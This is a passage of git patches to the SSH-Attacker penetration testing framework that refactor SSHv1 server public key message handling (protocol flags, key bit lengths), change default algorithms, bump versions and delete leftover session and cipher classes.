a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/VersionExchangeMessageSSHV1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/VersionExchangeMessageSSHV1.java @@ -9,7 +9,6 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.string.ModifiableString; -import de.rub.nds.sshattacker.core.constants.CharConstants; import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; @@ -58,13 +57,6 @@ public void setComment(String comment) { this.comment = ModifiableVariableFactory.safelySetValue(this.comment, comment); } - public String getIdentification() { - if (this.comment.getValue().isEmpty()) return this.version.getValue(); - return this.version.getValue() - + CharConstants.VERSION_COMMENT_SEPARATOR - + this.comment.getValue(); - } - public ModifiableString getEndOfMessageSequence() { return endOfMessageSequence; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java index 6bcb65588..540f21f14 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java @@ -8,10 +8,7 @@ package de.rub.nds.sshattacker.core.protocol.ssh1.parser; import de.rub.nds.modifiablevariable.util.ArrayConverter; -import de.rub.nds.sshattacker.core.constants.AuthenticationMethodSSHv1; -import de.rub.nds.sshattacker.core.constants.CipherMethod; -import de.rub.nds.sshattacker.core.constants.HybridKeyExchangeCombiner; -import de.rub.nds.sshattacker.core.constants.PublicKeyFormat; +import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; @@ -102,6 +99,7 @@ public ServerPublicKeyMessageParser(SshContext context, InputStream stream) { private void parseHostKeyBytes(ServerPublicKeyMessage message) { int hostKeyBits = parseIntField(4); + message.setHostKeyBitLenght(hostKeyBits); BigInteger exponent = parseMultiprecision(); BigInteger modulus = parseMultiprecision(); CustomRsaPublicKey publicKey = new CustomRsaPublicKey(exponent, modulus); @@ -129,6 +127,7 @@ private void parseHostKeyBytes(ServerPublicKeyMessage message) { private void parseServerKeyBytes(ServerPublicKeyMessage message) { int serverKeyBits = parseIntField(4); + message.setServerKeyBitLenght(serverKeyBits); BigInteger exponent = parseMultiprecision(); BigInteger modulus = parseMultiprecision(); CustomRsaPublicKey publicKey = new CustomRsaPublicKey(exponent, modulus); @@ -159,8 +158,21 @@ private void parseAntiSpoofingCookie(ServerPublicKeyMessage message) { } private void parseProtocolFlags(ServerPublicKeyMessage message) { - message.setProtocolFlags(parseByteArrayField(4)); - LOGGER.debug("Protocol Flags: {}", message.getProtocolFlags().getValue()); + message.setProtocolFlagMask(parseIntField(4)); + LOGGER.debug("Protocol Flags Mask {}", message.getProtocolFlagMask().getValue()); + + int flagMask = message.getProtocolFlagMask().getValue(); + String stringProtocolMask = Integer.toBinaryString(flagMask); + List chosenProtocolFlags = new ArrayList<>(); + for (int i = 0; i < stringProtocolMask.length(); i++) { + if (stringProtocolMask.charAt(i) == '1') { + int id = stringProtocolMask.length() - 1 - i; + chosenProtocolFlags.add(ProtocolFlag.fromId(id)); + LOGGER.debug("Parsed ProtocolFlags {} at id {}", ProtocolFlag.fromId(id), id); + } + } + + message.setChosenProtocolFlags(chosenProtocolFlags); } private void parseCipherMask(ServerPublicKeyMessage message) { @@ -175,7 +187,7 @@ private void parseCipherMask(ServerPublicKeyMessage message) { if (stringCipherMask.charAt(i) == '1') { int id = stringCipherMask.length() - 1 - i; supportedCipherMethods.add(CipherMethod.fromId(id)); - LOGGER.debug("Parsed Authentiationmethod {} at id {}", CipherMethod.fromId(id), id); + LOGGER.debug("Parsed Ciphers {} at id {}", CipherMethod.fromId(id), id); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/VersionExchangeMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/VersionExchangeMessageSSHV1Parser.java index ddcd24b3c..17f7bf3fc 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/VersionExchangeMessageSSHV1Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/VersionExchangeMessageSSHV1Parser.java @@ -21,23 +21,10 @@ public class VersionExchangeMessageSSHV1Parser private static final Logger LOGGER = LogManager.getLogger(); - /*public VersionExchangeMessageParser(byte[] array) { - super(array); - } - - public VersionExchangeMessageParser(byte[] array, int startPosition) { - super(array, startPosition); - }*/ - public VersionExchangeMessageSSHV1Parser(InputStream stream) { super(stream); } - /*@Override - protected VersionExchangeMessage createMessage() { - return new VersionExchangeMessage(); - }*/ - private void parseVersion(VersionExchangeMessageSSHV1 message) { // parse till CR NL (and remove them) String result = this.parseStringTill(CharConstants.NEWLINE); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java index d17330661..22c855ee3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java @@ -9,9 +9,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.*; -import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; -import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; -import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; +import de.rub.nds.sshattacker.core.crypto.keys.*; import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; @@ -41,11 +39,12 @@ public ServerPublicKeyMessagePreparator( @Override public void prepareMessageSpecificContents() { LOGGER.debug("Preparring now..."); - prepareServertKey(); + prepareServerKey(); prepareHostKey(); prepareAntiSpoofingCookie(); prepareSupportedCipers(); prepareSupportedAuthenticationMethods(); + prepareFlags(); } public void generateServerKey() throws CryptoException { @@ -68,18 +67,29 @@ public void prepareHostKey() { int hostKeylenght; SshPublicKey opt_hostKey = chooser.getConfig().getHostKeys().get(0); - CustomRsaPublicKey pubkey = (CustomRsaPublicKey) opt_hostKey.getPublicKey(); + CustomRsaPublicKey publicKey = (CustomRsaPublicKey) opt_hostKey.getPublicKey(); + if (!opt_hostKey.getPrivateKey().isPresent()) { + LOGGER.warn("no privat key defined for hostkey"); + } + if (opt_hostKey.getPublicKeyFormat().getName().equals(PublicKeyFormat.SSH_RSA.getName())) { + LOGGER.warn( + "the Host-Key is not formated as RSA Key-Type, it is {}", + opt_hostKey.getPublicKeyFormat().getName()); + } + CustomRsaPrivateKey privateKey = (CustomRsaPrivateKey) opt_hostKey.getPrivateKey().get(); + SshPublicKey hostKey = - new SshPublicKey<>(PublicKeyFormat.SSH_RSA, pubkey); + new SshPublicKey<>(PublicKeyFormat.SSH_RSA, publicKey, privateKey); getObject().setHostKey(hostKey); - CustomRsaPublicKey publicKey = (CustomRsaPublicKey) hostKey.getPublicKey(); - hostKeylenght = publicKey.getPublicExponent().bitLength(); + /* hostKeylenght = publicKey.getPublicExponent().bitLength(); hostKeylenght = hostKeylenght + publicKey.getModulus().bitLength(); getObject().setHostPublicModulus(publicKey.getModulus().toByteArray()); getObject().setHostPublicExponent(publicKey.getPublicExponent().toByteArray()); - getObject().setHostKeyByteLenght(hostKeylenght / 8); + getObject().setHostKeyByteLenght(hostKeylenght / 8);*/ + + getObject().setHostKeyBitLenght(publicKey.getModulus().bitLength()); LOGGER.debug( "[bro] Hostkey Exponent: {}", @@ -89,7 +99,7 @@ public void prepareHostKey() { ArrayConverter.bytesToHexString(publicKey.getModulus().toByteArray())); } - public void prepareServertKey() { + public void prepareServerKey() { int serverKeyLenght; try { @@ -99,14 +109,17 @@ public void prepareServertKey() { } chooser.getContext().getSshContext().setServerKey(serverKey); getObject().setServerKey(serverKey); - serverKeyLenght = serverKey.getPublicKey().getPublicExponent().bitLength(); + + /* serverKeyLenght = serverKey.getPublicKey().getPublicExponent().bitLength(); serverKeyLenght = serverKeyLenght + serverKey.getPublicKey().getModulus().bitLength(); - getObject().setServerKeyByteLenght(serverKeyLenght / 8); + getObject().setServerKeyByteLenght(serverKeyLenght / 8);*/ + getObject().setServerKeyBitLenght(serverKey.getPublicKey().getModulus().bitLength()); + /* getObject().setServerPublicModulus(serverKey.getPublicKey().getModulus().toByteArray()); getObject() .setServerPublicExponent( - serverKey.getPublicKey().getPublicExponent().toByteArray()); + serverKey.getPublicKey().getPublicExponent().toByteArray());*/ LOGGER.debug( "[bro] ServerKey Exponent: {}", @@ -164,4 +177,20 @@ public void prepareSupportedAuthenticationMethods() { public void prepareAntiSpoofingCookie() { getObject().setAntiSpoofingCookie(chooser.getConfig().getAntiSpoofingCookie()); } + + public void prepareFlags() { + int flagMask = 0; + List chosenProtocolFlags = chooser.getConfig().getChosenProtocolFlags(); + for (ProtocolFlag flag : chosenProtocolFlags) { + int shifter = flag.getId(); + int helper = 1; + + helper = helper << shifter; + flagMask = flagMask | helper; + LOGGER.debug("got {} shifted {}-times", ProtocolFlag.fromId(flag.getId()), shifter); + } + getObject().setChosenProtocolFlags(chooser.getConfig().getChosenProtocolFlags()); + + getObject().setProtocolFlagMask(flagMask); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/VersionExchangeMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/VersionExchangeMessageSSHV1Preparator.java index fa749c372..6238a9582 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/VersionExchangeMessageSSHV1Preparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/VersionExchangeMessageSSHV1Preparator.java @@ -25,18 +25,10 @@ public void prepareProtocolMessageContents() { getObject().setVersion(chooser.getClientVersion()); getObject().setComment(chooser.getClientComment()); getObject().setEndOfMessageSequence(chooser.getClientEndOfMessageSequence()); - /*chooser.getContext() - .getSshContext() - .getExchangeHashInputHolder() - .setClientVersion(getObject());*/ } else { getObject().setVersion(chooser.getServerVersion()); getObject().setComment(chooser.getServerComment()); getObject().setEndOfMessageSequence(chooser.getServerEndOfMessageSequence()); - /* chooser.getContext() - .getSshContext() - .getExchangeHashInputHolder() - .setServerVersion(getObject());*/ } } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java index 625977711..16484741c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java @@ -38,9 +38,9 @@ public void serializeMessageSpecificContents() { } private void serializeProtocolFlags() { - byte[] flags = new byte[4]; - appendBytes(flags); - LOGGER.debug("Flags: " + ArrayConverter.bytesToRawHexString(flags)); + int flags = message.getProtocolFlagMask().getValue(); + appendInt(flags, 4); + LOGGER.debug("Flags: " + Integer.toBinaryString(flags)); } private void serializeCipherMask() { @@ -72,7 +72,7 @@ private void serializeCookie() { } private void serializeServerKeyBytes() { - appendInt(message.getServerKey().getPublicKey().getModulus().bitLength(), 4); + appendInt(message.getServerKeyBitLenght().getValue(), 4); appendMultiPrecision(message.getServerKey().getPublicKey().getPublicExponent()); LOGGER.debug( @@ -89,7 +89,8 @@ private void serializeServerKeyBytes() { private void serializeHostKeyBytes() { - appendInt(message.getHostKey().getPublicKey().getModulus().bitLength(), 4); + appendInt(message.getHostKeyBitLenght().getValue(), 4); + appendMultiPrecision(message.getHostKey().getPublicKey().getPublicExponent()); LOGGER.debug( "Added Public Host Exponent with value {}", diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/factory/WorkflowConfigurationFactory.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/factory/WorkflowConfigurationFactory.java index fb3589832..9d43a4e22 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/factory/WorkflowConfigurationFactory.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/factory/WorkflowConfigurationFactory.java @@ -16,6 +16,7 @@ import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; import de.rub.nds.sshattacker.core.protocol.authentication.message.*; import de.rub.nds.sshattacker.core.protocol.connection.message.*; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; import de.rub.nds.sshattacker.core.protocol.ssh1.message.VersionExchangeMessageSSHV1; import de.rub.nds.sshattacker.core.protocol.transport.message.*; import de.rub.nds.sshattacker.core.workflow.WorkflowTrace; @@ -156,15 +157,15 @@ public WorkflowTrace createFullWorkflowTrace() { private void addSSHV1Packates(WorkflowTrace workflow) { AliasedConnection connection = getDefaultConnection(); workflow.addSshActions( - SshActionFactory.createMessageAction( - connection, ConnectionEndType.CLIENT, new VersionExchangeMessageSSHV1()), SshActionFactory.createMessageAction( connection, ConnectionEndType.SERVER, new VersionExchangeMessageSSHV1()), + SshActionFactory.createMessageAction( + connection, ConnectionEndType.CLIENT, new VersionExchangeMessageSSHV1()), new ChangePacketLayerAction(connection.getAlias(), PacketLayerType.BINARY_PACKET), SshActionFactory.createMessageAction( - connection, ConnectionEndType.CLIENT, new KeyExchangeInitMessage()), + connection, ConnectionEndType.SERVER, new ServerPublicKeyMessage()), SshActionFactory.createMessageAction( - connection, ConnectionEndType.SERVER, new KeyExchangeInitMessage())); + connection, ConnectionEndType.CLIENT, new ServerPublicKeyMessage())); } private void addTransportProtocolInitActions(WorkflowTrace workflow) { From d49096af5a52ff6208068c9c06e5fcc35cb6e614 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Fri, 11 Aug 2023 23:03:20 +0200 Subject: [PATCH 052/176] REV: Clean up some old code and lefovers from TLS-Attacker and older ideas. Working on feedback from PR-Review --- .idea/SSH-Attacker.iml | 9 - .idea/misc.xml | 2 +- Attacks/pom.xml | 2 +- SSH-Client/pom.xml | 2 +- SSH-Core-OQS/pom.xml | 2 +- SSH-Core/pom.xml | 2 +- .../nds/sshattacker/core/config/Config.java | 8 +- .../core/constants/ProtocolMessageType.java | 181 --------- .../core/constants/SessionByteLength.java | 29 -- .../core/crypto/cipher/DecryptionCipher.java | 32 -- .../core/crypto/cipher/EncryptionCipher.java | 32 -- .../sshattacker/core/layer/LayerStack.java | 4 +- .../core/layer/LayerStackFactory.java | 14 +- .../nds/sshattacker/core/layer/Message.java | 4 +- .../sshattacker/core/layer/ProtocolLayer.java | 28 +- .../layer/constant/ImplementedLayers.java | 8 +- .../layer/constant/LayerConfiguration.java | 9 +- .../core/layer/context/SshContext.java | 21 - .../core/layer/data/DataContainer.java | 2 +- .../sshattacker/core/layer/data/Handler.java | 1 + .../core/layer/data/Preparator.java | 9 - .../core/layer/data/Serializer.java | 2 +- .../core/layer/hints/PacketLayerHint.java | 41 +- .../{TransportLayer.java => PacketLayer.java} | 139 ++++--- .../core/layer/impl/SSH1Layer.java | 4 +- .../core/layer/impl/SSH2Layer.java | 24 +- .../core/packet/AbstractPacket.java | 19 - .../core/packet/layer/BinaryPacketLayer.java | 50 --- .../handler/ConnectionMessageHandler.java | 38 -- .../message/AuthenticationMessage.java | 3 - .../message/UserAuthBannerMessage.java | 21 +- .../parser/UserAuthBannerMessageParser.java | 4 +- .../core/protocol/common/ProtocolMessage.java | 16 +- .../protocol/common/layer/MessageLayer.java | 47 --- .../connection/message/ConnectionMessage.java | 129 ------ .../parser/ConnectionMessageParser.java | 45 --- .../ConnectionMessagePreparator.java | 40 -- .../ConnectionMessageSerializer.java | 40 -- .../message/KeyExchangeInitMessage.java | 2 +- .../message/VersionExchangeMessage.java | 2 - .../nds/sshattacker/core/session/Session.java | 369 ----------------- .../session/SessionCryptoComputations.java | 381 ------------------ .../core/session/cipher/CipherState.java | 126 ------ .../core/session/cipher/SessionCipher.java | 273 ------------- .../session/cipher/SessionCipherFactory.java | 87 ---- .../session/cipher/SessionNullCipher.java | 40 -- .../session/cipher/cryptohelper/KeySet.java | 126 ------ .../cipher/cryptohelper/KeySetGenerator.java | 262 ------------ .../core/session/crypto/Decryptor.java | 24 -- .../core/session/crypto/Encryptor.java | 24 -- .../session/crypto/SessionCryptoUnit.java | 56 --- .../core/session/crypto/SessionDecryptor.java | 65 --- .../core/session/crypto/SessionEncryptor.java | 61 --- .../core/session/parser/SessionParser.java | 107 ----- .../session/preparator/SessionPreparator.java | 115 ------ .../session/serializer/SessionSerializer.java | 78 ---- .../action/ForwardMessagesAction.java | 19 +- .../core/workflow/action/MessageAction.java | 30 +- .../action/ProxyFilterMessagesAction.java | 8 +- .../core/workflow/action/ReceiveAction.java | 2 + .../core/workflow/action/SshAction.java | 4 +- .../test/java/executing/NetcatWorkflow.java | 1 - .../java/executing/NetcatWorkflowFactory.java | 2 - SSH-Mitm/pom.xml | 2 +- SSH-Server/pom.xml | 2 +- pom.xml | 2 +- 66 files changed, 173 insertions(+), 3160 deletions(-) delete mode 100644 .idea/SSH-Attacker.iml delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/SessionByteLength.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/DecryptionCipher.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/EncryptionCipher.java rename SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/{TransportLayer.java => PacketLayer.java} (75%) delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/ConnectionMessageHandler.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/layer/MessageLayer.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ConnectionMessage.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ConnectionMessageParser.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ConnectionMessagePreparator.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ConnectionMessageSerializer.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/Session.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/SessionCryptoComputations.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/CipherState.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionCipher.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionCipherFactory.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionNullCipher.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/cryptohelper/KeySet.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/cryptohelper/KeySetGenerator.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/Decryptor.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/Encryptor.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/SessionCryptoUnit.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/SessionDecryptor.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/SessionEncryptor.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/parser/SessionParser.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/preparator/SessionPreparator.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/serializer/SessionSerializer.java diff --git a/.idea/SSH-Attacker.iml b/.idea/SSH-Attacker.iml deleted file mode 100644 index d6ebd4805..000000000 --- a/.idea/SSH-Attacker.iml +++ /dev/null @@ -1,9 +0,0 @@ - - - - - - - - - \ No newline at end of file diff --git a/.idea/misc.xml b/.idea/misc.xml index 1465bc128..14941d78d 100644 --- a/.idea/misc.xml +++ b/.idea/misc.xml @@ -8,5 +8,5 @@ - + \ No newline at end of file diff --git a/Attacks/pom.xml b/Attacks/pom.xml index caa25e46f..73b51c440 100644 --- a/Attacks/pom.xml +++ b/Attacks/pom.xml @@ -4,7 +4,7 @@ de.rub.nds.ssh.attacker ssh-attacker - 1.1.4-SNAPSHOT + 2.0.0-SNAPSHOT attacks diff --git a/SSH-Client/pom.xml b/SSH-Client/pom.xml index 672f89cdb..19163dcf5 100755 --- a/SSH-Client/pom.xml +++ b/SSH-Client/pom.xml @@ -4,7 +4,7 @@ de.rub.nds.ssh.attacker ssh-attacker - 1.1.4-SNAPSHOT + 2.0.0-SNAPSHOT ssh-client diff --git a/SSH-Core-OQS/pom.xml b/SSH-Core-OQS/pom.xml index 4336cafbc..5a567378d 100644 --- a/SSH-Core-OQS/pom.xml +++ b/SSH-Core-OQS/pom.xml @@ -4,7 +4,7 @@ de.rub.nds.ssh.attacker ssh-attacker - 1.1.4-SNAPSHOT + 2.0.0-SNAPSHOT ssh-core-oqs diff --git a/SSH-Core/pom.xml b/SSH-Core/pom.xml index 45e0749eb..4b4eaa9b3 100755 --- a/SSH-Core/pom.xml +++ b/SSH-Core/pom.xml @@ -4,7 +4,7 @@ de.rub.nds.ssh.attacker ssh-attacker - 1.1.4-SNAPSHOT + 2.0.0-SNAPSHOT ssh-core diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java index 854f4eaec..5988864e7 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java @@ -452,20 +452,20 @@ public EncryptionAlgorithm getDefaultSelectedEncryptionAlgorithm() { } private EncryptionAlgorithm defaultSelectedEncryptionAlgorithm = - EncryptionAlgorithm.AEAD_AES_256_GCM; + EncryptionAlgorithm.CHACHA20_POLY1305_OPENSSH_COM; public MacAlgorithm getDefaultSelectedMacAlgorithm() { return defaultSelectedMacAlgorithm; } - private MacAlgorithm defaultSelectedMacAlgorithm = MacAlgorithm.AEAD_AES_256_GCM; + private MacAlgorithm defaultSelectedMacAlgorithm = MacAlgorithm.UMAC_64_ETM_OPENSSH_COM; public KeyExchangeAlgorithm getDefaultSelectedKeyExchangeAlgorithm() { return defaultSelectedKeyExchangeAlgorithm; } private KeyExchangeAlgorithm defaultSelectedKeyExchangeAlgorithm = - KeyExchangeAlgorithm.DIFFIE_HELLMAN_GROUP14_SHA256; + KeyExchangeAlgorithm.CURVE25519_SHA256; // region Constructors and Initialization public Config() { @@ -473,7 +473,7 @@ public Config() { defaultClientConnection = new OutboundConnection("client", 65222, "localhost"); defaultServerConnection = new InboundConnection("server", 65222, "localhost"); - defaultLayerConfiguration = LayerConfiguration.SSHv2; + defaultLayerConfiguration = LayerConfiguration.SSHV2; // region VersionExchange initialization clientVersion = "SSH-2.0-OpenSSH_9.0"; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java deleted file mode 100644 index 04c03c050..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java +++ /dev/null @@ -1,181 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.constants; - -import java.util.HashMap; -import java.util.Map; - -public enum ProtocolMessageType { - /* UNKNOWN((byte) 99), - CHANGE_CIPHER_SPEC((byte) 20), - ALERT((byte) 21), - HANDSHAKE((byte) 22), - APPLICATION_DATA((byte) 23), - HEARTBEAT((byte) 24), - TLS12_CID((byte) 25),*/ - AUTHENTICATION((byte) 1), - CONNECTION((byte) 2), - TRANSPORT((byte) 3), - - VERSION_EXCHANGE_MESSAGE((byte) 0), - ASCII_MESSAGE((byte) 20), - SSH_MSG_DISCONNECT((byte) 1), - SSH_MSG_IGNORE((byte) 2), - SSH_MSG_UNIMPLEMENTED((byte) 3), - SSH_MSG_DEBUG((byte) 4), - SSH_MSG_SERVICE_REQUEST((byte) 5), - SSH_MSG_SERVICE_ACCEPT((byte) 6), - // [ RFC 8308 ] - SSH_MSG_EXT_INFO((byte) 7), - SSH_MSG_NEWCOMPRESS((byte) 8), - // 9 - 19 unassigned (transport layer generic) - SSH_MSG_KEXINIT((byte) 20), - SSH_MSG_NEWKEYS((byte) 21), - // 22 - 29 unassigned (algorithm negotiation) - // 30 - 49 reserved (key exchange method specific) - // [ RFC 4419 ] - SSH_MSG_KEX_DH_GEX_REQUEST_OLD((byte) 30, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), - SSH_MSG_KEX_DH_GEX_REQUEST((byte) 34, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), - SSH_MSG_KEX_DH_GEX_GROUP((byte) 31, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), - SSH_MSG_KEX_DH_GEX_INIT((byte) 32, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), - SSH_MSG_KEX_DH_GEX_REPLY((byte) 33, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), - // [ RFC 4253 ] - SSH_MSG_KEXDH_INIT((byte) 30, KeyExchangeFlowType.DIFFIE_HELLMAN), - SSH_MSG_KEXDH_REPLY((byte) 31, KeyExchangeFlowType.DIFFIE_HELLMAN), - // [ https://datatracker.ietf.org/doc/html/draft-kampanakis-curdle-pq-ssh-00 ] - SSH_MSG_HBR_INIT((byte) 30, KeyExchangeFlowType.HYBRID), - SSH_MSG_HBR_REPLY((byte) 31, KeyExchangeFlowType.HYBRID), - // [ RFC 5656 ] - SSH_MSG_KEX_ECDH_INIT((byte) 30, KeyExchangeFlowType.ECDH), - SSH_MSG_KEX_ECDH_REPLY((byte) 31, KeyExchangeFlowType.ECDH), - SSH_MSG_ECMQV_INIT((byte) 30, KeyExchangeFlowType.ECMQV), - SSH_MSG_ECMQV_REPLY((byte) 31, KeyExchangeFlowType.ECMQV), - // [ RFC 4432 ] - SSH_MSG_KEXRSA_PUBKEY((byte) 30, KeyExchangeFlowType.RSA), - SSH_MSG_KEXRSA_SECRET((byte) 31, KeyExchangeFlowType.RSA), - SSH_MSG_KEXRSA_DONE((byte) 32, KeyExchangeFlowType.RSA), - // [ RFC 4462 ] - // TODO: Add specificTo on GSS messages - SSH_MSG_KEXGSS_INIT((byte) 30), - SSH_MSG_KEXGSS_CONTINUE((byte) 31), - SSH_MSG_KEXGSS_COMPLETE((byte) 32), - SSH_MSG_KEXGSS_HOSTKEY((byte) 33), - SSH_MSG_KEXGSS_ERROR((byte) 34), - SSH_MSG_KEXGSS_GROUPREQ((byte) 40), - SSH_MSG_KEXGSS_GROUP((byte) 41), - // [ RFC 4252 ] - SSH_MSG_USERAUTH_REQUEST((byte) 50), - SSH_MSG_USERAUTH_FAILURE((byte) 51), - SSH_MSG_USERAUTH_SUCCESS((byte) 52), - SSH_MSG_USERAUTH_BANNER((byte) 53), - // 54 - 59 unassigned (user authentication generic) - // 60 - 79 reserved (user authentication method specific) - // [ RFC 4252 ] - SSH_MSG_USERAUTH_PK_OK((byte) 60, AuthenticationMethod.PUBLICKEY), - SSH_MSG_USERAUTH_PASSWD_CHANGEREQ((byte) 60, AuthenticationMethod.PASSWORD), - // [ RFC 4256 ] - SSH_MSG_USERAUTH_INFO_REQUEST((byte) 60, AuthenticationMethod.KEYBOARD_INTERACTIVE), - SSH_MSG_USERAUTH_INFO_RESPONSE((byte) 61, AuthenticationMethod.KEYBOARD_INTERACTIVE), - // [ RFC 4462 ] - SSH_MSG_USERAUTH_GSSAPI_RESPONSE( - (byte) 60, - new AuthenticationMethod[] { - AuthenticationMethod.GSSAPI, - AuthenticationMethod.GSSAPI_WITH_MIC, - AuthenticationMethod.GSSAPI_KEYEX - }), - SSH_MSG_USERAUTH_GSSAPI_TOKEN( - (byte) 61, - new AuthenticationMethod[] { - 